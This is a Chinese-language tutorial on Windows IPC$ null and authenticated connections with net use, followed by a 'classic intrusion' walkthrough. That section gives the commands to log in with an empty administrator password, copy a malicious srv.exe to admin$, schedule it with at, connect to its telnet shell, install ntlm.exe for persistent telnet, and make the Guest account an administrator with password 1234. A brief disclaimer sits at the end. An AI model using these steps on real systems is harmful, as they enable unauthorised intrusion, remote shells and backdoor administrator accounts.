建立空连接 ipc“共享管道”

### 建立空连接与IPC“共享管道”的详细解析 #### 一、IPC共享管道的概念 IPC（Inter-Process Communication）即进程间通信，在Windows系统中特指一种特殊的网络资源共享方式，允许远程用户通过特定的共享名（如`IPC$`）连接到本地计算机，从而实现对本地资源的操作。这种机制主要为了方便管理员进行远程管理和维护。 #### 二、建立IPC连接的方法 ##### 1. 建立空连接 空连接是指在不提供任何认证信息的情况下建立的IPC连接。这种方法通常用于探测目标机器是否存在默认或弱密码的情况。 ```batch net use \\IP\IPC$ "" /user:"" ``` **注意：**此命令中的三个空格非常重要。第一个空格是在IP地址和IPC$之间，第二个空格是在IPC$之后，第三个空格是在/user:之后。 ##### 2. 建立非空连接 非空连接是指在提供有效的用户名和密码的情况下建立的IPC连接。 ```batch net use \\IP\IPC$ "用户名" /user:"密码" ``` **注意：**同上，此命令中的三个空格也非常重要。此外，这里的用户名和密码需要替换为你所知道的有效凭证。 ##### 3. 映射默认共享 映射默认共享是指将目标机器的某个磁盘映射为本地的一个驱动器字母。 ```batch net use Z: \\IP\C$ "密码" /user:"用户名" ``` **注意：**这里的Z:是本地映射后的驱动器字母，C$表示目标机器的C盘，用户名和密码需要替换为有效的凭证信息。 如果已经建立了IPC$连接，则可以直接使用： ```batch net use Z: \\IP\C$ ``` ##### 4. 删除IPC连接 ```batch net use \\IP\IPC$ /del ``` ##### 5. 删除共享映射 ```batch net use C: /del ``` 删除指定的映射盘符。例如，要删除所有映射，可以使用： ```batch net use * /del ``` **注意：**删除所有映射时会有一个确认提示，需要按y确认。 #### 三、经典入侵模式详解 以下是一种经典的利用IPC共享管道进行远程访问的方法： 1. **建立空连接** ```batch net use \\127.0.0.1\IPC$ "" /user:administrators ``` **解释：**这里假设已经扫描出目标机器的用户名为administrators且密码为空，使用上述命令建立连接。 2. **上传恶意程序** ```batch copy srv.exe \\127.0.0.1\admin$ ``` **解释：**将恶意程序srv.exe上传至目标机器的admin$共享目录下，admin$默认对应于C:\WinNT\System32目录。 3. **查询时间** ```batch net time \\127.0.0.1 ``` **解释：**查询目标机器的时间，以便后续步骤中使用at命令时设置正确的时间。 4. **计划执行** ```batch at \\127.0.0.1 11:05 srv.exe ``` **解释：**使用at命令计划在目标机器上执行srv.exe。需要注意设置的时间要稍晚于目标机器的当前时间。 5. **验证时间** ```batch net time \\127.0.0.1 ``` **解释：**再次查询时间以确认是否到达执行srv.exe的时间。 6. **建立Shell** ```batch telnet 127.0.0.1 99 ``` **解释：**使用telnet命令连接目标机器上由srv.exe创建的99端口的Shell。 7. **上传ntlm.exe** ```batch copy ntlm.exe \\127.0.0.1\admin$ ``` **解释：**上传ntlm.exe至目标机器，用于后续建立持久化的telnet服务。 8. **启动ntlm服务** ```batch C:\WINNT\system32>ntlm ``` **解释：**在目标机器上启动ntlm服务，创建持久化的telnet服务。 9. **启用telnet服务** ```batch net start telnet ``` **解释：**启动telnet服务，使得可以从远程直接telnet连接。 10. **激活Guest账户** ```batch net user guest /active:yes ``` **解释：**激活目标机器上的Guest账户。 11. **修改Guest密码** ```batch net user guest 1234 ``` **解释：**设置Guest账户的密码为1234。 12. **添加Guest至Administrators组** ```batch net localgroup administrators guest /add ``` **解释：**将Guest账户添加至Administrators组中，赋予其管理员权限。 以上步骤详细介绍了一种利用IPC共享管道进行远程访问的经典模式，需要注意的是这些操作在未授权的情况下是非法的，仅供学习和技术交流使用。在实际应用中应当遵循网络安全的相关法律法规，并确保所有操作均在合法授权范围内进行。